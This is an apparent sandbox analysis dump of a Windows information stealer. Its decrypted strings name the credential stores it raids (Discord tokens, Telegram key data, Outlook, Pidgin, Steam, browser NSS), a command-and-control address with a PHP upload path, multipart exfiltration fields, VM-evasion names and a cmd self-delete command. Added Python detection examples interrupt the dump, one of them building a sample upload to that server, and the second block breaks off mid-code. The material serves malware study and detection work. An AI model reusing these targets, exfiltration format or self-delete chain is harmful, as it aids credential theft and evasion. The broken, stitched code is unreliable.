Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - CPU:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Threads:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Cores:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - RAM:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - GPU:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: User Agents:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: All Users:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Current User:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process List:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Temp\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: .exe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: runas
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: open
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /c start
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.lnk
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: files
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \discord\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: key_datas
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: map*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Telegram
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Tox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.tox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: *.ini
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Password
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000001
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000002
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000003
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 00000004
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Pidgin
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \.purple\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: token:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SteamPath
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \config\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ssfn*
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: config.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Steam\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: browsers
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: done
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: soft
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: https
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: POST
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: hwid
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: build
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: token
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: file_name
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: file
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: message
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCW
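The decrypted strings above (POST, HTTP/1.1, multipart/form-data with a "----" boundary, the alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, the field names hwid, build, token, file_name, file and message, and the /5499d72b3a3e55be.php path) describe the shape of the stealer's upload to its gate. The Python below is an added example, not code from this report or from the malware: it splits a raw POST of that shape with the standard library and applies a fingerprint a network analyst could run over captured request bodies. The two request bodies are constructed to match those strings; the field order, the boundary length and the build value are assumptions, not observed traffic.

```python
import re
from email import policy
from email.parser import BytesParser

# Form-field names taken from the sample's decrypted string table.
KNOWN_FIELDS = {"hwid", "build", "token", "file_name", "file", "message"}
# "----" prefix followed by characters from the decrypted alphabet string.
STEALER_BOUNDARY_RE = re.compile(r"----[A-Z0-9]+")
# The decrypted gate path is 16 hex characters plus ".php".
GATE_PATH_RE = re.compile(r"/[0-9a-f]{16}\.php")
BOUNDARY_PARAM_RE = re.compile(rb'boundary=("?)([^";\r\n]+)\1')


def parse_upload(raw_request: bytes) -> dict:
    """Split a raw HTTP/1.1 POST into request line, headers and multipart fields."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    content_type = headers.get(b"content-type", b"")
    match = BOUNDARY_PARAM_RE.search(content_type)
    if not match:
        raise ValueError("not a multipart/form-data request")
    # Hand the body to the stdlib MIME parser under the request's own Content-Type
    # so it splits the parts at the boundary and strips each part's trailing CRLF.
    message = BytesParser(policy=policy.default).parsebytes(
        b"Content-Type: " + content_type + b"\r\n\r\n" + body
    )
    fields = {}
    for part in message.iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = {
            "filename": part.get_filename(),
            "data": part.get_payload(decode=True),
        }
    return {
        "method": method.decode(),
        "path": path.decode(),
        "boundary": match.group(2).decode(),
        "fields": fields,
    }


def looks_like_stealer_upload(parsed: dict) -> bool:
    """Fingerprint: POST to /<16 hex>.php, a ----<A-Z0-9> boundary, only the known
    field names, and the hwid/build pair that tags the victim and the build."""
    names = set(parsed["fields"])
    return (
        parsed["method"] == "POST"
        and GATE_PATH_RE.fullmatch(parsed["path"]) is not None
        and STEALER_BOUNDARY_RE.fullmatch(parsed["boundary"]) is not None
        and names <= KNOWN_FIELDS
        and {"hwid", "build"} <= names
    )


# Constructed request shaped like the decrypted strings (not a captured C2 request).
SAMPLE_UPLOAD = (
    b"POST /5499d72b3a3e55be.php HTTP/1.1\r\n"
    b"Host: 85.28.47.31\r\n"
    b"Content-Type: multipart/form-data; boundary=----K7QZ3P1MX9\r\n"
    b"\r\n"
    b"------K7QZ3P1MX9\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"0123456789ABCDEF\r\n"
    b"------K7QZ3P1MX9\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"example_build\r\n"
    b"------K7QZ3P1MX9\r\n"
    b'Content-Disposition: form-data; name="file_name"\r\n'
    b"\r\n"
    b"screenshot.jpg\r\n"
    b"------K7QZ3P1MX9\r\n"
    b'Content-Disposition: form-data; name="file"; filename="screenshot.jpg"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"\xff\xd8\xff\xe0JFIF-constructed-bytes\r\n"
    b"------K7QZ3P1MX9--\r\n"
)

# Constructed ordinary browser form upload, for contrast.
SAMPLE_BENIGN = (
    b"POST /profile/avatar HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n"
    b"\r\n"
    b"------WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="username"\r\n'
    b"\r\n"
    b"alice\r\n"
    b"------WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="avatar"; filename="me.png"\r\n'
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"\x89PNG-constructed\r\n"
    b"------WebKitFormBoundary7MA4YWxk--\r\n"
)

if __name__ == "__main__":
    for req in (SAMPLE_UPLOAD, SAMPLE_BENIGN):
        parsed = parse_upload(req)
        print(parsed["path"], sorted(parsed["fields"]), looks_like_stealer_upload(parsed))
```

The fingerprint deliberately keys on the field-name set rather than on the IP or the .php name, since both change between builds while the upload format is what the decrypted strings fix.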
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB46C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CB46C80
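The strings C:\Windows\system32\cmd.exe, /c timeout /t 5 & del /f /q " and " & del "C:\ProgramData\*.dll"" & exit in the table above are the pieces of the sample's clean-up command, and the del glob together with the DLL names freebl3.dll, mozglue.dll, nss3.dll, softokn3.dll, sqlite3.dll, msvcp140.dll and vcruntime140.dll indicates that the helper libraries are written to C:\ProgramData before the browser databases are decrypted. The Python below is an added detection example, not part of this report: it runs two checks over constructed Sysmon-style process-creation and file-creation events. The event field names and the exact assembled command line are assumptions reconstructed from those string fragments.

```python
import ntpath
import re

# Self-delete chain assembled from the decrypted string fragments (assumed layout):
#   "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "<own exe>" & del "C:\ProgramData\*.dll"" & exit
SELF_DELETE_RE = re.compile(
    r'/c\s+timeout\s+/t\s+(?P<delay>\d+)\s*&\s*del\s+/f\s+/q\s+"(?P<target>[^"]+)"'
    r'(?:\s*&\s*del\s+"(?P<cleanup>[^"]+)"+)?',
    re.IGNORECASE,
)

# Helper DLLs named in the string table; the C:\ProgramData\*.dll glob in the
# clean-up command is what places them in that directory.
HELPER_DLLS = {
    "freebl3.dll", "mozglue.dll", "nss3.dll", "softokn3.dll",
    "sqlite3.dll", "msvcp140.dll", "vcruntime140.dll",
}
DROP_DIR = r"c:\programdata"


def find_self_delete(command_line: str):
    """Return delay, deleted target and clean-up glob if the line is the timeout+del chain."""
    match = SELF_DELETE_RE.search(command_line)
    if not match:
        return None
    return {
        "delay_s": int(match["delay"]),
        "target": match["target"],
        "cleanup_glob": match["cleanup"],
    }


def triage(events):
    """Apply both checks to Sysmon-style event dicts (field names are an assumption)."""
    findings = []
    for event in events:
        if event["EventType"] == "ProcessCreate":
            chain = find_self_delete(event["CommandLine"])
            # Only flag when the file being deleted is the parent that spawned cmd.exe:
            # a build script deleting a log file uses the same idiom and must not fire.
            if chain and chain["target"].lower() == event["ParentImage"].lower():
                findings.append({"rule": "self_delete_via_cmd",
                                 "pid": event["ProcessId"], **chain})
        elif event["EventType"] == "FileCreate":
            target = event["TargetFilename"]
            if (ntpath.dirname(target).lower() == DROP_DIR
                    and ntpath.basename(target).lower() in HELPER_DLLS):
                findings.append({"rule": "helper_dll_dropped_in_programdata",
                                 "pid": event["ProcessId"],
                                 "image": event["Image"], "file": target})
    return findings


# Constructed events (not taken from the report's own logs).
SAMPLE_EVENTS = [
    {
        "EventType": "ProcessCreate", "ProcessId": 4120,
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\Desktop\file.exe",
        "CommandLine": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\file.exe" & del "C:\ProgramData\*.dll"" & exit',
    },
    {   # same idiom from a build script: the target is not the parent, so no finding
        "EventType": "ProcessCreate", "ProcessId": 5008,
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Temp\build.log"',
    },
    {
        "EventType": "FileCreate", "ProcessId": 3920,
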